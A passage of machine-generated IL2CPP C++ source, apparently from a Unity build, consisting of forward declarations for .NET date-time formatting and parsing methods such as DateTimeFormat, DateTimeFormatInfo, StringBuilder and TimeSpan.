(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, int32_t ___dayofweek0, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::GetDayName(System.DayOfWeek) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_GetDayName_m82CF60408D75B103DAFF96575B257EFFA80569AF (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, int32_t ___dayofweek0, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::GetAbbreviatedMonthName(System.Int32) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_GetAbbreviatedMonthName_m5C71C0AB3BCCD6AE4C17104BCB4D2F65759E9D06 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, int32_t ___month0, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::GetMonthName(System.Int32) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_GetMonthName_m442F6260E03F4C61CE83A7DE211B62EB88678DDC (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, int32_t ___month0, const RuntimeMethod* method); // System.Globalization.Calendar System.Globalization.DateTimeFormatInfo::get_Calendar() extern "C" IL2CPP_METHOD_ATTR Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::internalGetMonthName(System.Int32,System.Globalization.MonthNameStyles,System.Boolean) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_internalGetMonthName_mE9361985B13F655CED883CDDF45DC962EE2F1F77 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, int32_t ___month0, int32_t ___style1, bool ___abbreviated2, const RuntimeMethod* method); // System.Text.StringBuilder System.Text.StringBuilder::Append(System.Char) extern "C" IL2CPP_METHOD_ATTR StringBuilder_t * StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A (StringBuilder_t * __this, Il2CppChar ___value0, const RuntimeMethod* method); // System.String System.String::Format(System.IFormatProvider,System.String,System.Object) extern "C" IL2CPP_METHOD_ATTR String_t* String_Format_m30892041DA5F50D7B8CFD82FFC0F55B5B97A2B7F (RuntimeObject* ___provider0, String_t* ___format1, RuntimeObject * ___arg02, const RuntimeMethod* method); // System.Text.StringBuilder System.Text.StringBuilderCache::Acquire(System.Int32) extern "C" IL2CPP_METHOD_ATTR StringBuilder_t * StringBuilderCache_Acquire_mCA3DDB17F0BFEF32DA9B4D7E8501D5705890557D (int32_t ___capacity0, const RuntimeMethod* method); // System.Int32 System.DateTimeFormat::ParseRepeatPattern(System.String,System.Int32,System.Char) extern "C" IL2CPP_METHOD_ATTR int32_t DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB (String_t* ___format0, int32_t ___pos1, Il2CppChar ___patternChar2, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::GetEraName(System.Int32) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_GetEraName_mA4F71726B4A0780F732E56EE4876DCDF7EA2EB38 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, int32_t ___era0, const RuntimeMethod* method); // System.Void System.DateTimeFormat::FormatDigits(System.Text.StringBuilder,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53 (StringBuilder_t * ___outputBuffer0, int32_t ___value1, int32_t ___len2, const RuntimeMethod* method); // System.String System.Int32::ToString(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* Int32_ToString_mE527694B0C55AE14FDCBE1D9C848446C18E22C09 (int32_t* __this, String_t* ___format0, RuntimeObject* ___provider1, const RuntimeMethod* method); // System.Int32 System.Text.StringBuilder::get_Length() extern "C" IL2CPP_METHOD_ATTR int32_t StringBuilder_get_Length_m44BCD2BF32D45E9376761FF33AA429BFBD902F07 (StringBuilder_t * __this, const RuntimeMethod* method); // System.Char System.Text.StringBuilder::get_Chars(System.Int32) extern "C" IL2CPP_METHOD_ATTR Il2CppChar StringBuilder_get_Chars_mC069533DCA4FB798DFA069469EBABA85DCC183C6 (StringBuilder_t * __this, int32_t ___index0, const RuntimeMethod* method); // System.Text.StringBuilder System.Text.StringBuilder::Remove(System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR StringBuilder_t * StringBuilder_Remove_m5DA9C1C4D056FA61B8923BE85E6BFF44B14A24F9 (StringBuilder_t * __this, int32_t ___startIndex0, int32_t ___length1, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_AMDesignator() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_PMDesignator() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.Void System.DateTimeFormat::HebrewFormatDigits(System.Text.StringBuilder,System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_HebrewFormatDigits_m89657AAA5FF4AC8C0E6D490BA0DD98DF2F92AEBC (StringBuilder_t * ___outputBuffer0, int32_t ___digits1, const RuntimeMethod* method); // System.String System.DateTimeFormat::FormatDayOfWeek(System.Int32,System.Int32,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_FormatDayOfWeek_m3F0892B000EBE522857AD1EE8676FEBBED8A21F9 (int32_t ___dayOfWeek0, int32_t ___repeat1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.String System.DateTimeFormat::FormatHebrewMonthName(System.DateTime,System.Int32,System.Int32,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_FormatHebrewMonthName_m95BC9040E14EDDE6DF41A71A93F9D7D1878661E6 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___time0, int32_t ___month1, int32_t ___repeatCount2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, const RuntimeMethod* method); // System.Globalization.DateTimeFormatFlags System.Globalization.DateTimeFormatInfo::get_FormatFlags() extern "C" IL2CPP_METHOD_ATTR int32_t DateTimeFormatInfo_get_FormatFlags_m42B106A8C2AC470D425032034608045AABB71731 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.Boolean System.DateTimeFormat::IsUseGenitiveForm(System.String,System.Int32,System.Int32,System.Char) extern "C" IL2CPP_METHOD_ATTR bool DateTimeFormat_IsUseGenitiveForm_mC6899D681D480B53806BD3AF1ED729552991AA66 (String_t* ___format0, int32_t ___index1, int32_t ___tokenLen2, Il2CppChar ___patternToMatch3, const RuntimeMethod* method); // System.String System.DateTimeFormat::FormatMonth(System.Int32,System.Int32,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_FormatMonth_mA46FA8711C67F699CA3571582725FA8CB226757F (int32_t ___month0, int32_t ___repeatCount1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.Globalization.DateTimeFormatInfo::get_HasForceTwoDigitYears() extern "C" IL2CPP_METHOD_ATTR bool DateTimeFormatInfo_get_HasForceTwoDigitYears_m4CF064E8CAFE2C1DBCDAE8747137E94ACBA81A7B (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.String::Concat(System.Object,System.Object) extern "C" IL2CPP_METHOD_ATTR String_t* String_Concat_mBB19C73816BDD1C3519F248E1ADC8E11A6FDB495 (RuntimeObject * ___arg00, RuntimeObject * ___arg11, const RuntimeMethod* method); // System.Void System.DateTimeFormat::FormatCustomizedTimeZone(System.DateTime,System.TimeSpan,System.String,System.Int32,System.Boolean,System.Text.StringBuilder) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_FormatCustomizedTimeZone_m31043AD6F2795436AB56520F2689E3E0DDA5C685 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___offset1, String_t* ___format2, int32_t ___tokenLen3, bool ___timeOnly4, StringBuilder_t * ___result5, const RuntimeMethod* method); // System.Void System.DateTimeFormat::FormatCustomizedRoundripTimeZone(System.DateTime,System.TimeSpan,System.Text.StringBuilder) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_FormatCustomizedRoundripTimeZone_mDCF0536EFD8B9E6DD2E794237D72D9C939099AC7 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___offset1, StringBuilder_t * ___result2, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_TimeSeparator() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_TimeSeparator_m9D230E9D88CE3E2EBA24365775D2B4B2D5621C58 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_DateSeparator() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_DateSeparator_m68C0C4E4320F22BAA7B6E6EFF7DD7349541D509C (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.Void System.Text.StringBuilder::.ctor() extern "C" IL2CPP_METHOD_ATTR void StringBuilder__ctor_mF928376F82E8C8FF3C11842C562DB8CF28B2735E (StringBuilder_t * __this, const RuntimeMethod* method); // System.Int32 System.DateTimeFormat::ParseQuoteString(System.String,System.Int32,System.Text.StringBuilder) extern "C" IL2CPP_METHOD_ATTR int32_t DateTimeFormat_ParseQuoteString_m0B491849EDF980D33DC51E7C756D244FF831CA60 (String_t* ___format0, int32_t ___pos1, StringBuilder_t * ___result2, const RuntimeMethod* method); // System.Text.StringBuilder System.Text.StringBuilder::Append(System.Object) extern "C" IL2CPP_METHOD_ATTR StringBuilder_t * StringBuilder_Append_mA1A063A1388A21C8EA011DBA7FC98C24C3EE3D65 (StringBuilder_t * __this, RuntimeObject * ___value0, const RuntimeMethod* method); // System.Int32 System.DateTimeFormat::ParseNextChar(System.String,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t DateTimeFormat_ParseNextChar_m7A2B93C769DB2E4AE88704BFB9D06216610F8F98 (String_t* ___format0, int32_t ___pos1, const RuntimeMethod* method); // System.String System.Char::ToString() extern "C" IL2CPP_METHOD_ATTR String_t* Char_ToString_mA42A88FEBA41B72D48BB24373E3101B7A91B6FD8 (Il2CppChar* __this, const RuntimeMethod* method); // System.String System.DateTimeFormat::FormatCustomized(System.DateTime,System.String,System.Globalization.DateTimeFormatInfo,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___offset3, const RuntimeMethod* method); // System.String System.Text.StringBuilderCache::GetStringAndRelease(System.Text.StringBuilder) extern "C" IL2CPP_METHOD_ATTR String_t* StringBuilderCache_GetStringAndRelease_mDD5B8378FE9378CACF8660EB460E0CE545F215F7 (StringBuilder_t * ___sb0, const RuntimeMethod* method); // System.Boolean System.TimeSpan::op_Equality(System.TimeSpan,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR bool TimeSpan_op_Equality_mEA0A4B7FDCAFA54C636292F7EB76F9A16C44096D (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___t10, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___t21, const RuntimeMethod* method); // System.DateTime System.DateTime::get_Now() extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_get_Now_mB464D30F15C97069F92C1F910DCDDC3DFCC7F7D2 (const RuntimeMethod* method); // System.Void System.DateTimeFormat::InvalidFormatForUtc(System.String,System.DateTime) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_InvalidFormatForUtc_m0E9CACD473EA60B086EAD03C09488869673E109D (String_t* ___format0, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime1, const RuntimeMethod* method); // System.DateTime System.DateTime::SpecifyKind(System.DateTime,System.DateTimeKind) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_SpecifyKind_m2E9B2B28CB3255EA842EBCBA42AF0565144D2316 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___value0, int32_t ___kind1, const RuntimeMethod* method); // System.Boolean System.TimeSpan::op_GreaterThanOrEqual(System.TimeSpan,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR bool TimeSpan_op_GreaterThanOrEqual_m7FE9830EF2AAD2BB65628A0FE7F7C70161BB4D9B (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___t10, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___t21, const RuntimeMethod* method); // System.TimeSpan System.TimeSpan::Negate() extern "C" IL2CPP_METHOD_ATTR TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 TimeSpan_Negate_m0DC5231DD5489EB3A8A7AE9AC30F83CBD3987C33 (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * __this, const RuntimeMethod* method); // System.Int32 System.TimeSpan::get_Hours() extern "C" IL2CPP_METHOD_ATTR int32_t TimeSpan_get_Hours_mE248B39F7E3E07DAD257713114E86A1A2C191A45 (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * __this, const RuntimeMethod* method); // System.Text.StringBuilder System.Text.StringBuilder::AppendFormat(System.IFormatProvider,System.String,System.Object) extern "C" IL2CPP_METHOD_ATTR StringBuilder_t * StringBuilder_AppendFormat_m0097821BD0E9086D37BEE314239983EBD980B636 (StringBuilder_t * __this, RuntimeObject* ___provider0, String_t* ___format1, RuntimeObject * ___arg02, const RuntimeMethod* method); // System.Int32 System.TimeSpan::get_Minutes() extern "C" IL2CPP_METHOD_ATTR int32_t TimeSpan_get_Minutes_mCABF9EE7E7F78368DA0F825F5922C06238DD0F22 (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * __this, const RuntimeMethod* method); // System.Text.StringBuilder System.Text.StringBuilder::AppendFormat(System.IFormatProvider,System.String,System.Object,System.Object) extern "C" IL2CPP_METHOD_ATTR StringBuilder_t * StringBuilder_AppendFormat_m6253057BEFDE3B0EDC63B8C725CD573486720D4C (StringBuilder_t * __this, RuntimeObject* ___provider0, String_t* ___format1, RuntimeObject * ___arg02, RuntimeObject * ___arg13, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_ShortDatePattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_LongDatePattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_LongDatePattern_mB46C198F0A2ED40F705A73B83BF17592B1899FAB (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_ShortTimePattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_ShortTimePattern_m2E9988522765F996BFB93BF34EA7673A3A484417 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.String::Concat(System.String,System.String,System.String) extern "C" IL2CPP_METHOD_ATTR String_t* String_Concat_mF4626905368D6558695A823466A1AF65EADB9923 (String_t* ___str00, String_t* ___str11, String_t* ___str22, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_FullDateTimePattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_FullDateTimePattern_mC8709BFB52E481105D6B4150293C2FBC0FEAA5B4 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_GeneralShortTimePattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_GeneralShortTimePattern_m6528409AA7B4B138D136F9F5C6C2CA16981EBAB8 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_GeneralLongTimePattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_GeneralLongTimePattern_m4803CD35334AA775089F6E48DF03817B6068E130 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_MonthDayPattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_RFC1123Pattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_RFC1123Pattern_m8216E79C7C862A9AE400D52FCF07EA0B0C9AD49E (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_SortableDateTimePattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_SortableDateTimePattern_mF3A3FA3102096383E0E18C01F7F7A5F50375EF1B (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_LongTimePattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_LongTimePattern_m5304AFC0442E7F208D4D39392E3CE8C0B56F5266 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_UniversalSortableDateTimePattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_UniversalSortableDateTimePattern_m2322E2915D3E6EB5A61DDCA1F6F9CC07C61D4141 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_YearMonthPattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_YearMonthPattern_m58DC71FC083C4CBF5C2856140BEE5EC705AA5034 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.Globalization.DateTimeFormatInfo System.Globalization.DateTimeFormatInfo::get_InvariantInfo() extern "C" IL2CPP_METHOD_ATTR DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC (const RuntimeMethod* method); // System.Boolean System.TimeSpan::op_Inequality(System.TimeSpan,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR bool TimeSpan_op_Inequality_mEAE207F8B9A9B42CC33F4DE882E69E98C09065FC (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___t10, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___t21, const RuntimeMethod* method); // System.DateTime System.DateTime::op_Subtraction(System.DateTime,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_op_Subtraction_m679BBE02927C8538BBDD10A514E655568246830B (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___d0, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___t1, const RuntimeMethod* method); // System.Void System.DateTimeFormat::InvalidFormatForLocal(System.String,System.DateTime) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_InvalidFormatForLocal_m9049D2389DBF1FCAD1AF3E98F2B462E17104053B (String_t* ___format0, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime1, const RuntimeMethod* method); // System.Object System.Globalization.DateTimeFormatInfo::Clone() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * DateTimeFormatInfo_Clone_m72D6280296E849FF0BD23A282C1B5ECC81EAF6BA (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.Boolean System.Type::op_Inequality(System.Type,System.Type) extern "C" IL2CPP_METHOD_ATTR bool Type_op_Inequality_m615014191FB05FD50F63A24EB9A6CCA785E7CEC9 (Type_t * ___left0, Type_t * ___right1, const RuntimeMethod* method); // System.Globalization.Calendar System.Globalization.GregorianCalendar::GetDefaultInstance() extern "C" IL2CPP_METHOD_ATTR Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A (const RuntimeMethod* method); // System.Void System.Globalization.DateTimeFormatInfo::set_Calendar(System.Globalization.Calendar) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormatInfo_set_Calendar_m6388B63636828B8525557FA2976C965897E8BF3C (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___value0, const RuntimeMethod* method); // System.String System.DateTimeFormat::GetRealFormat(System.String,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_GetRealFormat_mAAA9091BEC0C4473B1D7377152247CEFD2BC4ED0 (String_t* ___format0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, const RuntimeMethod* method); // System.String System.DateTimeFormat::Format(System.DateTime,System.String,System.Globalization.DateTimeFormatInfo,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_Format_mA965A0AFBC1F2DA20C56B16652515CB08F515CFC (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___offset3, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::get_DateTimeOffsetPattern() extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_get_DateTimeOffsetPattern_mF5E6E8E53ED7C8B1262F04DCC2AC8E951FDF2060 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.DateTimeFormat::ExpandPredefinedFormat(System.String,System.DateTime&,System.Globalization.DateTimeFormatInfo&,System.TimeSpan&) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_ExpandPredefinedFormat_m61BDA6D452DFDB96A8CB7369474886DE29C5395A (String_t* ___format0, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * ___dateTime1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** ___dtfi2, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * ___offset3, const RuntimeMethod* method); // System.Void System.DateTimeResult::Init() extern "C" IL2CPP_METHOD_ATTR void DateTimeResult_Init_m6CA70DCCC2BF43E42B46A3275082E2E89726869D (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * __this, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::TryParseExact(System.String,System.String,System.Globalization.DateTimeFormatInfo,System.Globalization.DateTimeStyles,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_TryParseExact_m3A1B2D674B4C6AA4F1768B10FCF311D54006DFDE (String_t* ___s0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, int32_t ___style3, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result4, const RuntimeMethod* method); // System.Exception System.DateTimeParse::GetDateTimeParseException(System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR Exception_t * DateTimeParse_GetDateTimeParseException_m26091CD2EBBFFEA867F71D3910742714FF38F733 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, const RuntimeMethod* method); // System.Void System.DateTimeResult::SetFailure(System.ParseFailureKind,System.String,System.Object,System.String) extern "C" IL2CPP_METHOD_ATTR void DateTimeResult_SetFailure_m718CC7D41E722D8310669F2E8788E30B8B5AA184 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * __this, int32_t ___failure0, String_t* ___failureMessageID1, RuntimeObject * ___failureMessageFormatArgument2, String_t* ___failureArgumentName3, const RuntimeMethod* method); // System.Void System.DateTimeResult::SetFailure(System.ParseFailureKind,System.String,System.Object) extern "C" IL2CPP_METHOD_ATTR void DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * __this, int32_t ___failure0, String_t* ___failureMessageID1, RuntimeObject * ___failureMessageFormatArgument2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::DoStrictParse(System.String,System.String,System.Globalization.DateTimeStyles,System.Globalization.DateTimeFormatInfo,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_DoStrictParse_m404C0A9C38726E4B07EE689493F4BAFBEEA50E15 (String_t* ___s0, String_t* ___formatParam1, int32_t ___styles2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result4, const RuntimeMethod* method); // System.Globalization.CompareInfo System.__DTString::get_CompareInfo() extern "C" IL2CPP_METHOD_ATTR CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * __DTString_get_CompareInfo_mE0381FC6A1AB82E0BDAF45F848568124B193FB51 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Boolean System.Char::IsLetter(System.Char) extern "C" IL2CPP_METHOD_ATTR bool Char_IsLetter_mCC7F387F16C2DE7C85B6A1A0C5BC75D92A813DFE (Il2CppChar ___c0, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::MatchWord(System.__DTString&,System.String) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchWord_mC620454975484A06318A4488BA503D763B98EE34 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, String_t* ___target1, const RuntimeMethod* method); // System.Boolean System.__DTString::GetNext() extern "C" IL2CPP_METHOD_ATTR bool __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::IsDigit(System.Char) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_IsDigit_mCC840BC9EC5E157F967F148BC12F6A815E75B74A (Il2CppChar ___ch0, const RuntimeMethod* method); // System.DTSubString System.__DTString::GetSubString() extern "C" IL2CPP_METHOD_ATTR DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D __DTString_GetSubString_m699C79DE88DFBC0BDD9F85C2CDC155ABB1473DC4 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Void System.__DTString::ConsumeSubString(System.DTSubString) extern "C" IL2CPP_METHOD_ATTR void __DTString_ConsumeSubString_mDFAADAA4A5FC450399046DB04CE10A4503961FAA 